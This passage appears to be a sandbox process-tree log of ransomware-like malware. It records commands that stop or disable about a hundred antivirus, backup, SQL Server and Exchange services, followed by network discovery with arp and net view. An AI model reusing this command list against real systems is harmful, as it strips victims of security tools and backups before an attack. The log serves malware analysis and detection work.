"sc.exe" config SSDPSRV start= auto
2⤵
PID:1984

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SstpSvc start= disabled
2⤵
PID:1620

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
2⤵
PID:1892

C:\Windows\SysWOW64\sc.exe
"sc.exe" config upnphost start= auto
2⤵
PID:1784

C:\Windows\SysWOW64\sc.exe
"sc.exe" config SQLWriter start= disabled
2⤵
PID:864

C:\Windows\SysWOW64\net.exe
"net.exe" start Dnscache /y
2⤵
PID:688

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start Dnscache /y
3⤵
PID:1120

C:\Windows\SysWOW64\net.exe
"net.exe" stop bedbg /y
2⤵
PID:1388

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop bedbg /y
3⤵
PID:1364

C:\Windows\SysWOW64\net.exe
"net.exe" start FDResPub /y
2⤵
PID:1368

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start FDResPub /y
3⤵
PID:268

C:\Windows\SysWOW64\net.exe
"net.exe" start SSDPSRV /y
2⤵
PID:1624

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start SSDPSRV /y
3⤵
PID:1716

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SQL_2008 /y
2⤵
PID:1796

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
3⤵
PID:932

C:\Windows\SysWOW64\net.exe
"net.exe" stop avpsus /y
2⤵
PID:1208

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop avpsus /y
3⤵
PID:804

C:\Windows\SysWOW64\net.exe
"net.exe" start upnphost /y
2⤵
PID:980

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start upnphost /y
3⤵
PID:1592

C:\Windows\SysWOW64\net.exe
"net.exe" stop ccEvtMgr /y
2⤵
PID:1056

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ccEvtMgr /y
3⤵
PID:772

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeDLPAgentService /y
2⤵
PID:1084

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
3⤵
PID:1884

C:\Windows\SysWOW64\net.exe
"net.exe" stop EhttpSrv /y
2⤵
PID:936

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EhttpSrv /y
3⤵
PID:564

C:\Windows\SysWOW64\net.exe
"net.exe" stop ccSetMgr /y
2⤵
PID:108

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
3⤵
PID:1612

C:\Windows\SysWOW64\net.exe
"net.exe" stop MMS /y
2⤵
PID:1780

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MMS /y
3⤵
PID:1372

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfewc /y
2⤵
PID:564

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfewc /y
3⤵
PID:2116

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SYSTEM_BGC /y
2⤵
PID:1684

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
3⤵
PID:2084

C:\Windows\SysWOW64\net.exe
"net.exe" stop EPSecurityService /y
2⤵
PID:2060

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPSecurityService /y
3⤵
PID:2268

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$SQLEXPRESS /y
2⤵
PID:660

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
3⤵
PID:2104

C:\Windows\SysWOW64\net.exe
"net.exe" stop SavRoam /y
2⤵
PID:1964

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
3⤵
PID:2096

C:\Windows\SysWOW64\net.exe
"net.exe" stop RTVscan /y
2⤵
PID:2172

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
3⤵
PID:2320

C:\Windows\SysWOW64\net.exe
"net.exe" stop DefWatch /y
2⤵
PID:2212

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DefWatch /y
3⤵
PID:2336

C:\Windows\SysWOW64\net.exe
"net.exe" stop NetBackup BMR MTFTP Service /y
2⤵
PID:2188

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
3⤵
PID:2312

C:\Windows\SysWOW64\net.exe
"net.exe" stop ekrn /y
2⤵
PID:2144

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ekrn /y
3⤵
PID:2288

C:\Windows\SysWOW64\net.exe
"net.exe" stop BMR Boot Service /y
2⤵
PID:2132

C:\Windows\SysWOW64\net.exe
"net.exe" stop QBFCService /y
2⤵
PID:2280

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
3⤵
PID:2480

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2008R2 /y
2⤵
PID:2376

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
3⤵
PID:2588

C:\Windows\SysWOW64\net.exe
"net.exe" stop mozyprobackup /y
2⤵
PID:2356

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mozyprobackup /y
3⤵
PID:2440

C:\Windows\SysWOW64\net.exe
"net.exe" stop VSNAPVSS /y
2⤵
PID:2400

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
3⤵
PID:2604

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$TPS /y
2⤵
PID:2424

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPS /y
3⤵
PID:2596

C:\Windows\SysWOW64\net.exe
"net.exe" stop QBIDPService /y
2⤵
PID:2432

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
3⤵
PID:2580

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2012 /y
2⤵
PID:2472

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
3⤵
PID:2656

C:\Windows\SysWOW64\net.exe
"net.exe" stop SDRSVC /y
2⤵
PID:2464

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SDRSVC /y
3⤵
PID:3032

C:\Windows\SysWOW64\net.exe
"net.exe" stop Intuit.QuickBooks.FCS /y
2⤵
PID:2496

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
3⤵
PID:2668

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamTransportSvc /y
2⤵
PID:2516

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
3⤵
PID:2948

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$TPSAMA /y
2⤵
PID:2552

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
3⤵
PID:3060

C:\Windows\SysWOW64\net.exe
"net.exe" stop ntrtscan /y
2⤵
PID:2544

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ntrtscan /y
3⤵
PID:2680

C:\Windows\SysWOW64\net.exe
"net.exe" stop EPUpdateService /y
2⤵
PID:2536

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPUpdateService /y
3⤵
PID:2960

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
2⤵
PID:2712

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
3⤵
PID:3008

C:\Windows\SysWOW64\net.exe
"net.exe" stop KAVFS /y
2⤵
PID:2736

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop KAVFS /y
3⤵
PID:2092

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
2⤵
PID:2720

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
3⤵
PID:2088

C:\Windows\SysWOW64\net.exe
"net.exe" stop FA_Scheduler /y
2⤵
PID:2704

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop FA_Scheduler /y
3⤵
PID:3052

C:\Windows\SysWOW64\net.exe
"net.exe" stop QBCFMonitorService /y
2⤵
PID:2692

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
3⤵
PID:3016

C:\Windows\SysWOW64\net.exe
"net.exe" stop YooBackup /y
2⤵
PID:2756

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
3⤵
PID:1372

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
2⤵
PID:2972

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
3⤵
PID:1516

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamCatalogSvc /y
2⤵
PID:2864

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCatalogSvc /y
3⤵
PID:1756

C:\Windows\SysWOW64\net.exe
"net.exe" stop klnagent /y
2⤵
PID:2848

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop klnagent /y
3⤵
PID:320

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SQL_2008 /y
2⤵
PID:2832

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
3⤵
PID:1976

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamBrokerSvc /y
2⤵
PID:2808

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBrokerSvc /y
3⤵
PID:1676

C:\Windows\SysWOW64\net.exe
"net.exe" stop ESHASRV /y
2⤵
PID:2792

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ESHASRV /y
3⤵
PID:3044

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2008R2 /y
2⤵
PID:2784

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
3⤵
PID:1612

C:\Windows\SysWOW64\net.exe
"net.exe" stop PDVFSService /y
2⤵
PID:2776

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
3⤵
PID:2140

C:\Windows\SysWOW64\net.exe
"net.exe" stop EsgShKernel /y
2⤵
PID:2768

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EsgShKernel /y
3⤵
PID:2052

C:\Windows\SysWOW64\net.exe
"net.exe" stop YooIT /y
2⤵
PID:2116

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop YooIT /y
3⤵
PID:2068

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploymentService /y
2⤵
PID:2124

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
3⤵
PID:2200

C:\Windows\SysWOW64\net.exe
"net.exe" stop zhudongfangyu /y
2⤵
PID:440

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
3⤵
PID:2136

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
2⤵
PID:1540

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
3⤵
PID:2220

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamCloudSvc /y
2⤵
PID:932

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCloudSvc /y
3⤵
PID:2340

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$TPS /y
2⤵
PID:2304

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
3⤵
PID:2352

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamNFSSvc /y
2⤵
PID:2204

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
3⤵
PID:2312

C:\Windows\SysWOW64\net.exe
"net.exe" stop macmnsvc /y
2⤵
PID:2196

C:\Windows\SysWOW64\net.exe
"net.exe" stop SQLWriter /y
2⤵
PID:1124

C:\Windows\SysWOW64\net.exe
"net.exe" stop KAVFSGT /y
2⤵
PID:2216

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop KAVFSGT /y
3⤵
PID:2508

C:\Windows\SysWOW64\net.exe
"net.exe" stop veeam /y
2⤵
PID:2396

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop veeam /y
3⤵
PID:2360

C:\Windows\SysWOW64\net.exe
"net.exe" stop stc_raw_agent /y
2⤵
PID:2240

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
3⤵
PID:2600

C:\Windows\SysWOW64\net.exe
"net.exe" stop masvc /y
2⤵
PID:2440

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop masvc /y
3⤵
PID:2936

C:\Windows\SysWOW64\net.exe
"net.exe" stop PDVFSService /y
2⤵
PID:2384

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
3⤵
PID:2648

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamBackupSvc /y
2⤵
PID:2392

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBackupSvc /y
3⤵
PID:2588

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecJobEngine /y
2⤵
PID:2672

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
3⤵
PID:2400

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos AutoUpdate Service” /y
2⤵
PID:2524

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
3⤵
PID:2976

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeIS /y
2⤵
PID:2476

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS /y
3⤵
PID:2796

C:\Windows\SysWOW64\net.exe
"net.exe" stop NetMsmqActivator /y
2⤵
PID:2884

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetMsmqActivator /y
3⤵
PID:2864

C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer100 /y
2⤵
PID:2820

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer100 /y
3⤵
PID:1120

C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQL Backups /y
2⤵
PID:2656

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQL Backups /y
3⤵
PID:2740

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Enterprise Client Service” /y
2⤵
PID:2428

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Enterprise Client Service” /y
3⤵
PID:2924

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentAccelerator /y
2⤵
PID:2660

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
3⤵
PID:2356

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecVSSProvider /y
2⤵
PID:2532

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
3⤵
PID:2788

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
2⤵
PID:2380

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
3⤵
PID:2424

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecDiveciMediaService /y
2⤵
PID:2460

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
3⤵
PID:2948

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecAgentBrowser /y
2⤵
PID:2488

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
3⤵
PID:2828

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploymentService /y
2⤵
PID:2604

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
3⤵
PID:2892

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecManagementService /y
2⤵
PID:1528

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
3⤵
PID:3060

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLFDLauncher$TPSAMA /y
2⤵
PID:2964

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
3⤵
PID:2988

C:\Windows\SysWOW64\net.exe
"net.exe" stop SamSs /y
2⤵
PID:2944

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SamSs /y
3⤵
PID:2768

C:\Windows\SysWOW64\net.exe
"net.exe" stop kavfsslp /y
2⤵
PID:2888

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop kavfsslp /y
3⤵
PID:1884

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer /y
2⤵
PID:2100

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer /y
3⤵
PID:2300

C:\Windows\SysWOW64\net.exe
"net.exe" stop MBAMService /y
2⤵
PID:2072

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MBAMService /y
3⤵
PID:1768

C:\Windows\SysWOW64\net.exe
"net.exe" stop BackupExecRPCService /y
2⤵
PID:2084

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
3⤵
PID:2264

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerADHelper /y
2⤵
PID:1612

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper /y
3⤵
PID:2528

C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQLsafe Backup Service” /y
2⤵
PID:688

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
3⤵
PID:2208

C:\Windows\SysWOW64\net.exe
"net.exe" stop MsDtsServer110 /y
2⤵
PID:2188

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer110 /y
3⤵
PID:2180

C:\Windows\SysWOW64\net.exe
"net.exe" stop POP3Svc /y
2⤵
PID:1984

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop POP3Svc /y
3⤵
PID:2268

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeMGMT /y
2⤵
PID:2144

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMGMT /y
3⤵
PID:2348

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Clean Service” /y
2⤵
PID:2472

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Clean Service” /y
3⤵
PID:2152

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeEngineService /y
2⤵
PID:2544

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeEngineService /y
3⤵
PID:2512

C:\Windows\SysWOW64\net.exe
"net.exe" stop MBEndpointAgent /y
2⤵
PID:1964

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MBEndpointAgent /y
3⤵
PID:2708

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLSERVER /y
2⤵
PID:864

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLSERVER /y
3⤵
PID:2616

C:\Windows\SysWOW64\net.exe
"net.exe" stop “SQLsafe Filter Service” /y
2⤵
PID:2132

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
3⤵
PID:2308

C:\Windows\SysWOW64\net.exe
"net.exe" stop msftesql$PROD /y
2⤵
PID:2376

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msftesql$PROD /y
3⤵
PID:2292

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SQL_2008 /y
2⤵
PID:1388

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
3⤵
PID:320

C:\Windows\SysWOW64\net.exe
"net.exe" stop SstpSvc /y
2⤵
PID:2092

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SstpSvc /y
3⤵
PID:2584

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeMTA /y
2⤵
PID:2836

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMTA /y
3⤵
PID:2520

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SYSTEM_BGC /y
2⤵
PID:2832

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
3⤵
PID:2568

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Device Control Service” /y
2⤵
PID:2868

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
3⤵
PID:2588

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Symantec System Recovery” /y
2⤵
PID:3004

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Symantec System Recovery” /y
3⤵
PID:2448

C:\Windows\SysWOW64\net.exe
"net.exe" stop SMTPSvc /y
2⤵
PID:1624

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SMTPSvc /y
3⤵
PID:2952

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamDeploySvc /y
2⤵
PID:2432

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploySvc /y
3⤵
PID:2176

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcrSch2Svc /y
2⤵
PID:1796

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
3⤵
PID:2624

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeSA /y
2⤵
PID:2920

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSA /y
3⤵
PID:2128

C:\Windows\SysWOW64\net.exe
"net.exe" stop UI0Detect /y
2⤵
PID:2824

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop UI0Detect /y
3⤵
PID:2740

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$SQL_2008 /y
2⤵
PID:2980

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
3⤵
PID:2424

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamHvIntegrationSvc /y
2⤵
PID:2904

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
3⤵
PID:2996

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamEnterpriseManagerSvc /y
2⤵
PID:2808

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
3⤵
PID:1780

C:\Windows\SysWOW64\net.exe
"net.exe" stop AcronisAgent /y
2⤵
PID:2940

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
3⤵
PID:2296

C:\Windows\SysWOW64\net.exe
"net.exe" stop CASAD2DWebSvc /y
2⤵
PID:2928

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
3⤵
PID:2784

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfefire /y
2⤵
PID:2972

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfefire /y
3⤵
PID:2416

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerADHelper100 /y
2⤵
PID:2696

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
3⤵
PID:3032

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos File Scanner Service” /y
2⤵
PID:2764

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
3⤵
PID:2916

C:\Windows\SysWOW64\net.exe
"net.exe" stop CAARCUpdateSvc /y
2⤵
PID:2556

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
3⤵
PID:2960

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeFramework /y
2⤵
PID:1156

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeFramework /y
3⤵
PID:1120

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Veeam Backup Catalog Data Service” /y
2⤵
PID:2316

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
3⤵
PID:3044

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$SYSTEM_BGC /y
2⤵
PID:1512

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
3⤵
PID:2704

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$TPS /y
2⤵
PID:2260

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPS /y
3⤵
PID:2468

C:\Windows\SysWOW64\net.exe
"net.exe" stop wbengine /y
2⤵
PID:2016

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
3⤵
PID:2856

C:\Windows\SysWOW64\net.exe
"net.exe" stop W3Svc /y
2⤵
PID:1368

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop W3Svc /y
3⤵
PID:2984

C:\Windows\SysWOW64\net.exe
"net.exe" stop sophos /y
2⤵
PID:2220

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sophos /y
3⤵
PID:2540

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$SQL_2008 /y
2⤵
PID:2564

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
3⤵
PID:108

C:\Windows\SysWOW64\net.exe
"net.exe" stop VeeamMountSvc /y
2⤵
PID:2596

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamMountSvc /y
3⤵
PID:3164

C:\Windows\SysWOW64\arp.exe
"arp" -a
2⤵
PID:2356

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSExchangeSRS /y
2⤵
PID:3008

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSRS /y
3⤵
PID:3332

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Acronis VSS Provider” /y
2⤵
PID:2140

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
3⤵
PID:3324

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQLServerOLAPService /y
2⤵
PID:2360

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
3⤵
PID:3300

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Zoolz 2 Service” /y
2⤵
PID:2912

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
3⤵
PID:3420

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSOLAP$TPS /y
2⤵
PID:2728

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPS /y
3⤵
PID:3348

C:\Windows\SysWOW64\net.exe
"net.exe" stop ReportServer$TPSAMA /y
2⤵
PID:2060

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
3⤵
PID:3524

C:\Windows\SysWOW64\net.exe
"net.exe" stop “Sophos Health Service” /y
2⤵
PID:2860

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Health Service” /y
3⤵
PID:3412

C:\Windows\SysWOW64\net.exe
"net.exe" stop mfemms /y
2⤵
PID:2708

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfemms /y
3⤵
PID:3340

C:\Windows\SysWOW64\net.exe
"net.exe" stop wbengine /y
2⤵
PID:1520

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
3⤵
PID:3316

C:\Windows\SysWOW64\net.exe
"net.exe" stop RESvc /y
2⤵
PID:2300

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RESvc /y
3⤵
PID:3548

C:\Windows\SysWOW64\net.exe
"net.exe" stop McAfeeFrameworkMcAfeeFramework /y
2⤵
PID:2244

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
3⤵
PID:3460

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c net view
2⤵
PID:400

